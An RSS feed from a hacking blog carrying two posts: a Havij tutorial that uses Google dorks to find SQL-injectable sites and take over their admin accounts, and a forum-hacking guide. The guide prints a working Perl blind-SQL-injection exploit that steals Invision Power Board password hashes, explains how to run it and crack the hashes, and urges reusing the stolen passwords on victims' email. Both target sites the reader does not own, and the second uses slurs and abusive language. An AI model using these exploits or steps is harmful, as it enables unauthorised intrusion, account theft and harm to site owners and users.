<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>Hacking Truths &#187; Hacking Forum</title>
	<atom:link href="http://www.hungry-hackers.com/category/hacking-forum/feed" rel="self" type="application/rss+xml" />
	<link>http://www.hungry-hackers.com</link>
	<description>Hacking is fun, If you are a &#34;Hacker&#34;!</description>
	<lastBuildDate>Wed, 11 Jan 2012 19:43:17 +0000</lastBuildDate>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
	<generator>http://wordpress.org/?v=</generator>
		<item>
		<title>SQL Injection Using Havij</title>
		<link>http://www.hungry-hackers.com/2011/02/sql-injection-using-havij.html</link>
		<comments>http://www.hungry-hackers.com/2011/02/sql-injection-using-havij.html#comments</comments>
		<pubDate>Thu, 10 Feb 2011 03:42:40 +0000</pubDate>
		<dc:creator>Irfan Shakeel</dc:creator>
				<category><![CDATA[Hacking Forum]]></category>
		<category><![CDATA[Hacking Tutorials]]></category>
		<category><![CDATA[Hardcore Hacking]]></category>
		<category><![CDATA[Penetration Testing]]></category>
		<category><![CDATA[Security]]></category>
		<category><![CDATA[Server Hacking]]></category>
		<category><![CDATA[Cracking]]></category>
		<category><![CDATA[google dorks]]></category>
		<category><![CDATA[Hacking]]></category>
		<category><![CDATA[Havij]]></category>
		<category><![CDATA[penetration]]></category>
		<category><![CDATA[Server]]></category>
		<category><![CDATA[SQL]]></category>
		<category><![CDATA[SQL Injection]]></category>
		<category><![CDATA[testing]]></category>
		<category><![CDATA[vulnerablibity]]></category>

		<guid isPermaLink="false">http://www.hungry-hackers.com/?p=1807</guid>
		<description><![CDATA[SQL injection is an attack in which malicious code is inserted into strings that are later passed to an instance of SQL Server for parsing and execution. Any procedure that constructs SQL statements should be reviewed for injection vulnerabilities because SQL Server will execute all syntactically valid queries that it receives. Even parameterized data can be manipulated by a skilled and determined attacker.]]></description>
			<content:encoded><![CDATA[<p style="text-align: justify;"><img class="alignleft size-full wp-image-1808" src="http://www.hungry-hackers.com/wp-content/uploads/2011/02/sql_img.jpg" alt="" width="300" height="225" />SQL injection is an attack in which malicious code is inserted into  strings that are later passed to an instance of SQL Server for parsing  and execution. Any procedure that constructs SQL statements should be  reviewed for injection vulnerabilities because SQL Server will execute  all syntactically valid queries that it receives. Even parameterized  data can be manipulated by a skilled and determined attacker.</p>
<p style="text-align: justify;"><span id="more-1807"></span>SQL Injection can be done by manually injection or via automatic tools. Automatic tools are easy to use and do not require much technical knowledge.</p>
<p style="text-align: justify;">In this tutorial we will discuss Havij. Havij is an automated SQL Injection tool that helps  penetration testers to find and exploit SQL Injection vulnerabilities on  a web page.</p>
<ul style="text-align: justify;">
<li>You can download havij from <a href="http://www.itsecteam.com/en/projects/project1.htm">here</a>.</li>
<li>We will use google dorks to find the vulnerable websites, there is a big list of google dorks  which I will post in my future articles but at this time we will only use the following:</li>
</ul>
<p style="text-align: justify;"><em> </em></p>
<blockquote style="text-align: justify;"><p><em>inurl:index.php?id=</em></p>
<p><em>inurl:trainers.php?id=</em></p>
<p><em>inurl:buy.php?category=</em></p>
<p style="text-align: justify;"><em>inurl:article.php?ID=</em></p>
</blockquote>
<p style="text-align: justify;"><em> </em></p>
<ul style="text-align: justify;">
<li>Just search google using one of the dork and you will see a lot of vulnerable websites.</li>
<li>Open any one of the website than put <em> &#8216;</em> after the link look:</li>
</ul>
<ul style="text-align: justify;">
<li>If you get the following SQL error, that means the website is vulnerable to SQL-injection attack.
<p style="text-align: center;"><img class="aligncenter size-full wp-image-1810" src="http://www.hungry-hackers.com/wp-content/uploads/2011/02/21.jpg" alt="" width="515" height="437" /></p>
</li>
<li>Now open Havij and paste the link without &#8216;
<p style="text-align: center;"><img class="size-medium wp-image-1813  aligncenter" src="http://www.hungry-hackers.com/wp-content/uploads/2011/02/1-273x300.jpg" alt="" width="359" height="394" /></p>
<p style="text-align: center;"><img class="size-medium wp-image-1816  aligncenter" src="http://www.hungry-hackers.com/wp-content/uploads/2011/02/myphoto2-274x300.jpg" alt="" width="364" height="399" /></p>
</li>
<li>Now we have to find the columns of the database.
<p style="text-align: center;"><img class="size-medium wp-image-1815  aligncenter" src="http://www.hungry-hackers.com/wp-content/uploads/2011/02/myphoto3-274x300.jpg" alt="" width="366" height="399" /></p>
<p style="text-align: center;"><img class="size-medium wp-image-1819  aligncenter" src="http://www.hungry-hackers.com/wp-content/uploads/2011/02/myphoto4-275x300.jpg" alt="" width="372" height="405" /></p>
</li>
<li>After this you will be able to find the admin id or password but remember normally web server uses MD5 encryption technique, you have to decrypt this password use havij option MD5 or you may read our tutorial on <a title="Cracking MD5" href="http://www.hungry-hackers.com/2008/06/cracking-md5.html" target="_blank">Cracking MD5</a>.</li>
</ul>
<p style="text-align: center;"><a href="http://www.hungry-hackers.com/wp-content/uploads/2011/02/myphoto5.jpg"><img class="size-medium wp-image-1818  aligncenter" src="http://www.hungry-hackers.com/wp-content/uploads/2011/02/myphoto5-274x300.jpg" alt="" width="359" height="392" /></a></p>
<ul style="text-align: justify;">
<li>After decrypting the password, you have to find the admin login page of the website. To do that use Havij options.</li>
<li>Now you may login as the admin user and control the website as you want.</li>
<li>H@ppy H@cking</li>
</ul>
<p><strong>Video Tutorial</strong></p>
<p style="text-align: justify;"><object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" width="425" height="350" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,40,0"><param name="play" value="false" /><param name="quality" value="high" /><param name="scale" value="showall" /><param name="src" value="http://www.youtube.com/v/Qvhdz8yE_po" /><embed type="application/x-shockwave-flash" width="425" height="350" src="http://www.youtube.com/v/Qvhdz8yE_po" scale="showall" quality="high" play="false"></embed></object></p>
<p style="text-align: justify;"><strong>About The Author</strong></p>
<p style="text-align: justify;"><strong>Irfan Shakeel </strong>is an  ethical hacker/penetration tester and he have found many bugs on the  famous web server. He is the founder of Ethical <a href="http://www.ehacking.net/" target="_blank">Hacking Blog.</a></p>
<img src="http://www.hungry-hackers.com/?ak_action=api_record_view&id=1807&type=feed" alt="" />]]></content:encoded>
			<wfw:commentRss>http://www.hungry-hackers.com/2011/02/sql-injection-using-havij.html/feed</wfw:commentRss>
		<slash:comments>12</slash:comments>
		</item>
		<item>
		<title>How to Hack into forums</title>
		<link>http://www.hungry-hackers.com/2008/06/how-to-hack-into-forums.html</link>
		<comments>http://www.hungry-hackers.com/2008/06/how-to-hack-into-forums.html#comments</comments>
		<pubDate>Tue, 10 Jun 2008 10:00:40 +0000</pubDate>
		<dc:creator>Ashik</dc:creator>
				<category><![CDATA[Hacking Forum]]></category>
		<category><![CDATA[Hacking Tutorials]]></category>
		<category><![CDATA[Hardcore Hacking]]></category>
		<category><![CDATA[Code]]></category>
		<category><![CDATA[Cracking]]></category>
		<category><![CDATA[Forum]]></category>
		<category><![CDATA[Hacking]]></category>
		<category><![CDATA[tutorial]]></category>

		<guid isPermaLink="false">http://www.hungry-hackers.com/?p=299</guid>
		<description><![CDATA[This is what you like to call &#8220;Hacking a forum&#8221;.
I call it &#8220;Cracking into a forum&#8221; &#8230; Learn what hacking means you lazy fucks, lol&#8230;
PS: I am hacking a forum slowly, everything i am doing now, is posted here by steps :
First of all, what you need is a forum to hack. For the sake of this tutorial, and for the safety of a specific site, I will not release the URL of the site that I will be hacking in this. I will be refering to it as &#8220;hackingsite&#8221;.
So ...]]></description>
			<content:encoded><![CDATA[<p>This is what you like to call &#8220;Hacking a forum&#8221;.</p>
<p>I call it &#8220;Cracking into a forum&#8221; &#8230; Learn what hacking means you lazy fucks, lol&#8230;</p>
<p>PS: I am hacking a forum slowly, everything i am doing now, is posted here by steps :</p>
<p>First of all, what you need is a forum to hack. For the sake of this tutorial, and for the safety of a specific site, I will not release the URL of the site that I will be hacking in this. I will be refering to it as &#8220;hackingsite&#8221;.</p>
<p>So you&#8217;ve got your target. You know the forum to want to hack, but how? Let&#8217;s find the user we want to hack. Typically, you&#8217;d want to hack the admin. The administrator is usually the first member, therefore his/her User ID will be &#8220;1&#8243;. Find the User ID of the administrator, or person you wish to hack. For this tutorial, let&#8217;s say his/her ID is &#8220;2&#8243;.</p>
<p>Got it? Well, now we are almost all set. So far, we know the site we wish to hack, and the member we wish to hack. In this case, we are hacking the administrator of &#8220;hackingsite&#8221;, which is User ID &#8220;2&#8243;.</p>
<p>Now we need a nice exploit. I preferably, for 1.3.1 forums, use one that is in common circulation around these forums. For those who don&#8217;t have it, here:</p>
<p><strong>CODE</strong></p>
<blockquote><p>#!/usr/bin/perl -w<br />
##################################################  ################<br />
# This one actually works http://www.quantriweb.com/forum/images/smilies/smile.gif Just paste the outputted cookie into<br />
# your request header using livehttpheaders or something and you<br />
# will probably be logged in as that user. No need to decrypt it!<br />
# Exploit coded by &#8220;ReMuSOMeGa &amp; Nova&#8221; and http://remusomega.com (http://remusomega.com/)<br />
##################################################  ################<br />
use LWP::UserAgent;<br />
$ua = new LWP::UserAgent;<br />
$ua-&gt;agent(&#8220;Mosiac 1.0&#8243; . $ua-&gt;agent);<br />
if (!$ARGV[0]) {$ARGV[0] = &#8221;;}<br />
if (!$ARGV[3]) {$ARGV[3] = &#8221;;}<br />
my $path = $ARGV[0] . &#8216;/index.php?act=Login&amp;CODE=autologin&#8217;;<br />
my $user = $ARGV[1]; # userid to jack<br />
my $iver = $ARGV[2]; # version 1 or 2<br />
my $cpre = $ARGV[3]; # cookie prefix<br />
my $dbug = $ARGV[4]; # debug?<br />
if (!$ARGV[2])<br />
{<br />
print &#8220;..By ReMuSoMeGa &amp; Nova. Usage: ipb.pl http://forums.site.org (http://forums.site.org/) [id] [ver 1/2].\n\n&#8221;;<br />
exit;<br />
}<br />
my @charset = (&#8220;0&#8243;,&#8221;1&#8243;,&#8221;2&#8243;,&#8221;3&#8243;,&#8221;4&#8243;,&#8221;5&#8243;,&#8221;6&#8243;,&#8221;7&#8243;,&#8221;8&#8243;,&#8221;9&#8243;,&#8221;a&#8221;,&#8221;b&#8221;,&#8221;c&#8221;,&#8221;d&#8221;,&#8221;e&#8221;,&#8221;f&#8221;);<br />
my $outputs = &#8221;;<br />
for( $i=1; $i &lt; 33; $i++ )<br />
{<br />
for( $j=0; $j &lt; 16; $j++ )<br />
{<br />
my $current = $charset[$j];<br />
my $sql = ( $iver &lt; 2 ) ?<br />
&#8220;99%2527+OR+(id%3d$user+AND+MID(password,$i,1)%3d%2  527$current%2527)/*&#8221; :<br />
&#8220;99%2527+OR+(id%3d$user+AND+MID(member_login_key,$i  ,1)%3d%2527$current%2527)/*&#8221;;<br />
my @cookie = (&#8216;Cookie&#8217; =&gt; $cpre . &#8220;member_id=31337420; &#8221; . $cpre . &#8220;pass_hash=&#8221; . $sql);<br />
my $res = $ua-&gt;get($path, @cookie);<br />
# If we get a valid sql request then this<br />
# does not appear anywhere in the sources<br />
$pattern = &#8221;;<br />
$_ = $res-&gt;content;<br />
if ($dbug) { print };<br />
if ( !(/$pattern/) )<br />
{<br />
$outputs .= $current;<br />
print &#8220;$current\n&#8221;;<br />
last;<br />
}<br />
}<br />
if ( length($outputs) &lt; 1 ) { print &#8220;Not Exploitable!\n&#8221;; exit; }<br />
}<br />
print &#8220;Cookie: &#8221; . $cpre . &#8220;member_id=&#8221; . $user . &#8220;;&#8221; . $cpre . &#8220;pass_hash=&#8221; . $outputs;<br />
exit;</p></blockquote>
<p>What the fuck,Pretty confused, aren&#8217;t you? What the fuck are you supposed to do with this shit?! I&#8217;ll tell you. First of all, this is a Perl script. Copy and paste that code into Notepad.</p>
<p>How can you execute Perl scripts? Well, you can upload them to your CGI-BIN, or you can take my route of preference, and install Perl on your PC.</p>
<p>Your going to want to go and get ActivePerl. I am sure it&#8217;s here somewhere in Appz.</p>
<p>Open the file up, and let it install. Leave everything on default. In otherwords, just keep hitting &#8220;OK&#8221;.</p>
<p>So now you have Perl installed. Open up &#8220;My Computer&#8221;, and then click on &#8220;Local Disk (C:/)&#8221;. In there, you should see a folder named &#8220;Perl&#8221;. Open up that folder, and within &#8220;Perl&#8221;, you should see another folder named &#8220;bin&#8221;. Open up &#8220;bin&#8221;. Now that your in, drag and drop &#8220;ipb.pl&#8221; from your desktop, into &#8220;bin&#8221;.</p>
<p>Alrighty. Now everything is fine, and you&#8217;re ready to Pwn some FAGS &#8230;</p>
<p>What your going to want to do now, is open up your command prompt. If you don&#8217;t know how, please quit this site, and die&#8230;. Start &#8211; Run &#8211; CMD</p>
<p>Alright, so now your in your command prompt. You want to change the directory in your command prompt to your Perl/bin directory. To do this, type the following into your command prompt, and hit enter:</p>
<p>cd C:\Perl\bin</p>
<p>Good job. Your very, very close to being finished. Now that you are in the Perl/bin directory, we need to access the ipb.pl file. How do we do this? Type the following command into your command prompt:</p>
<p>perl ipb.pl</p>
<p>So, this is what we need to do. Type the following command into your command prompt:</p>
<p>ipb.pl http://hackingsite.com/forum 2 1</p>
<p>Obviously replace &#8220;http://hackingsite.com/forum&#8221; with the URL to the forum you wish to hack.</p>
<p>Now, this may take a minute. The exploit is gathering information, and grabbing the hash. Numbers/letters will slowly appear down the screen. Don&#8217;t be alarmed, and allow the program a few minutes. Once the hash grabbing is complete, it will return a full hash, as well as User ID.</p>
<p>Now you have the hash. In our case, the hash is: 4114d9d3061dd2a41d2c64f4d2bb1a7f</p>
<p>But what can we do with this hash? To you, it just looks like a scramble of numbers and letters. What this is, is an MD5 hash. This is the person&#8217;s password, encrypted using the MD5 algorthrim. I urge you to do a quick read-up on MD5 hash&#8217;s before continuing reading.</p>
<p>Done? You understand the very basics of MD5s? Good. You&#8217;re probably thinking: I just read that MD5 hashes cannot be cracked!</p>
<p>LOL.. Indeed, MD5s are impossible to reverse. Once a string is MD5ed, there is no way to get it back to plain-text. It is IMPOSSIBLE to decrypt an MD5 hash. But.. It is NOT impossible to CRACK an MD5 hash.</p>
<p>There are many places online where you can enter hashes to be cracked. Personally, I use &#8220;Cain &amp; Able&#8221;, which is a great MD5 cracker availiable at &#8216;http://odix.it&#8217;.</p>
<p>You can use any method, and any crackers to crack this hash. 90% of the hashes I get, I am able to crack. Once you crack the hash, you will be given a plain-text password.</p>
<p>CONGRATS! You now have the victims password! You can now login to his/her account on whatever forum you were hacking. Hell, you could even try that password on his/her e-mail or MSN/AIM account. SureFire bro, fuck them up</p>
<p>But what if the hash is not crackable? You are merely left with a password hash. What can you do with this?</p>
<p>Well, you can spoof your cookie!</p>
<p>If you would like to learn more on spoofing cookies, use the friendly searching site they call &#8220;GOOGLE&#8221;</p>
<p>Good luck!</p>
<img src="http://www.hungry-hackers.com/?ak_action=api_record_view&id=299&type=feed" alt="" />]]></content:encoded>
			<wfw:commentRss>http://www.hungry-hackers.com/2008/06/how-to-hack-into-forums.html/feed</wfw:commentRss>
		<slash:comments>101</slash:comments>
		</item>
	</channel>
</rss>


<!-- Performance optimized by W3 Total Cache. Learn more: http://www.w3-edge.com/wordpress-plugins/

Minified using disk: basic
Page Caching using disk: enhanced
Database Caching using disk: basic
Object Caching 510/584 objects using disk: basic

Served from: hungry-hackers.com @ 2012-02-12 01:40:35 -->
